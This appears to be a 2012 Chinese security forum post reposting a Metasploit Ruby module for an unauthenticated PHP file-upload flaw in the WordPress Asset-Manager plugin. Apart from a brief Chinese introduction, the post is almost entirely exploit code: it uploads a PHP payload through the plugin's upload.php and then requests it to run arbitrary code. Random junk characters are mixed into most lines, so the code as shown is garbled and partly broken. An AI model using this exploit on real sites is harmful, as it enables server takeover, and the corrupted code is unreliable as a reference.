找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2113|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
3 d, F- D" k4 t6 `7 D) t: B  A) t* \4 l' W; O' |# u0 G; Y
##
& ?, V1 h( i7 a5 I# This file is part of the Metasploit Framework and may be subject to$ _6 {" I( r4 r4 `4 H
# redistribution and commercial restrictions. Please see the Metasploit
" Z0 M) O* p( g/ X$ \- X! Z# Framework web site for more information on licensing and terms of use.
' X4 y8 ]  U7 J5 e" M0 A/ h#   http://metasploit.com/framework/
8 |2 z% m6 s& K' x##
5 l9 T* o5 s% o) Q! w
& q* N! S& E: W8 }" ~) M) M$ crequire 'msf/core'
$ e$ M) y( H- g6 Xrequire 'msf/core/exploit/php_exe'
* n/ @9 U% ]1 _3 k) V5 }' Y% D
9 j% p/ C9 w9 I/ C9 }class Metasploit3 < Msf::Exploit::Remote
% ?3 h7 j4 `$ _) ?/ n! x  Rank = ExcellentRanking
! ]/ e6 g" n6 q  e0 V1 u/ `/ }! ?  M
' `7 j$ Y9 S  T% Q+ I! w% {: l  include Msf::Exploit::Remote::HttpClient4 v/ Y, h: s" z* w! [: S
  include Msf::Exploit:hpEXE) `; A# }$ |% x' @
: k7 ?; m7 t$ J1 I1 F; q
  def initialize(info = {})* j9 n1 H, ~. `* B, F% m
    super(update_info(info,
- z- e0 U  E6 W4 A3 e) |      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
7 r, s& p2 [0 @& U  A& d% R      'Description'    => %q{' r* v! g- u, V. ?, H! ~
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
2 ~/ B4 n" l5 y2 W7 r        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
  |5 j8 n8 l! q+ N5 o        temp directory without authentication, which results in arbitrary code execution.- z* N, t# K! G
      },
' d: T4 k5 z1 V! H      'Author'         =>
( Q: l0 X( r9 g' [7 }7 V6 \        [
" G, r6 w8 O+ N4 F4 H4 q8 w          'Sammy FORGIT', # initial discovery
. x) O: Q3 q& _          'James Fitts <fitts.james[at]gmail.com>' # metasploit module& S' q' q: l: k! h6 |* h
        ],5 I2 a9 O# h3 _! r
      'License'        => MSF_LICENSE,1 B" X; N+ o. F6 |1 o6 G+ P' r
      'References'     =>
3 H* F$ w9 `  p* E) o8 T        [
, m$ J/ a: e) @/ R          [ 'OSVDB', '82653' ],
3 w) B( E1 Y$ P9 G- v7 Q* T5 X          [ 'BID', '53809' ],/ a4 w( D& K0 r2 ]3 M7 z5 V
          [ 'EDB', '18993' ],
; z% v, ^! |+ e* a          [ 'URL', 'http:// www.myhack58.com /' ]
. d# a( [. [0 y' x9 o        ],
0 Z1 U- Y' V0 \& Y6 W) p      'Payload'       =>8 c) t/ w( o9 U- Q$ M
        {+ ~. x9 N" d+ W3 U/ j' o6 z  m: O
          'BadChars' => "\x00",$ J; h0 i6 ?' d4 V( L
        },
- f6 S! Z; r/ x% \$ V$ S1 U2 S      'Platform'       => 'php',& O4 c4 E& k$ R# \7 N7 d3 z3 J5 v
      'Arch'           => ARCH_PHP,$ E" `* n0 r$ Y: V% O8 ?. n% B
      'Targets'        =>
  i& Q; \7 i* n        [
3 ~5 t, `; Q, n" z0 I/ v* {7 K          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ U9 t/ {' a! \8 B  {* p" Z7 I- L
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- v9 w0 [' U$ N# d/ D
        ],
7 Q* Y; ?4 q: I/ V' P0 z7 [) K1 w1 T      'DefaultTarget' => 0,4 l6 z8 D8 Y* X
      'DisclosureDate' => 'May 26 2012'))
/ I' K" e2 b! c  ]& a+ j" W4 ] ! j0 ?) y: \/ ~# o4 G, c- L4 ~' M0 E
    register_options(
+ p9 M, o! c! S2 H      [
; t2 A. N& t! R  I$ l  x        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; J9 x0 u, Y7 f! F& o: x! B) K, Q      ], self.class)
# o/ V7 l  `. u3 T: Q  end
+ S/ l. |$ q( A; o3 @$ }
! G) T7 Q' \9 z  def exploit* s/ p, P1 |% L8 t, [
    uri =  target_uri.path
* |6 i9 h, Y  i  U1 e8 y    uri << '/' if uri[-1,1] != '/'( }4 c+ ~) a* p8 t7 X
    peer = "#{rhost}:#{rport}"7 m/ m  q( M/ N% Y- H. Q
    payload_name = "#{rand_text_alpha(5)}.php"
& k" T" L2 ~+ R2 ~9 s1 _+ v    php_payload = get_write_exec_payload(:unlink_self=>true)# _4 _: }: a; i7 X+ r

- s% x! o: ^$ H$ m: c& p    data = Rex::MIME::Message.new
: W+ u% l. H, Q! \    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 P  O. _0 d6 m# H
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 H$ n9 {7 @0 ~# B4 U - y7 k  Z) f4 @6 N: X& ~9 X+ j
    print_status("#{peer} - Uploading payload #{payload_name}"): h! ]( ~% L2 Q8 A  V8 ~
    res = send_request_cgi({
) S' T2 x7 H( ?5 W& \      'method'  => 'POST',; x% m' Q& f) n. _
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",, W( z- k& T% q9 g* |6 d
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",0 t* U) }9 y4 L7 V' N1 k4 M6 V2 w
      'data'    => post_data
5 f: V% X+ g' x    })" Q9 a- a# z9 C2 G4 b! _
% s2 l8 A2 u8 w/ O! e7 Q( K
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
" y, I0 o7 g( n  x      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, q  _/ w  T4 ?end! [( v2 @) C7 E" S
) P. g8 s# E6 O( _' _! g
    print_status("#{peer} - Executing payload #{payload_name}")1 {+ l) _5 X9 `( @& z. ^" c* l
    res = send_request_raw({- N; d$ r' s3 F7 }3 B7 A& ?
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
* i$ \$ S, h- Z9 J$ T& m      'method'  => 'GET'
3 a( Y& ]9 v+ O# I7 ~    })
4 A1 I, W( _$ K6 g* U 6 \% g" C% g. o9 y$ v9 w6 a  q/ p
    if res and res.code != 2004 D) K9 x/ n9 s8 k( y+ w. p* m+ ]; p
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( X+ M' m! l9 D5 Q    end1 @. p( X" [5 X% i; ?: l( }! g
  end
  o' E, J- {7 a0 Jend
) n6 Z$ S& b: ^2 m: B0 _! W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表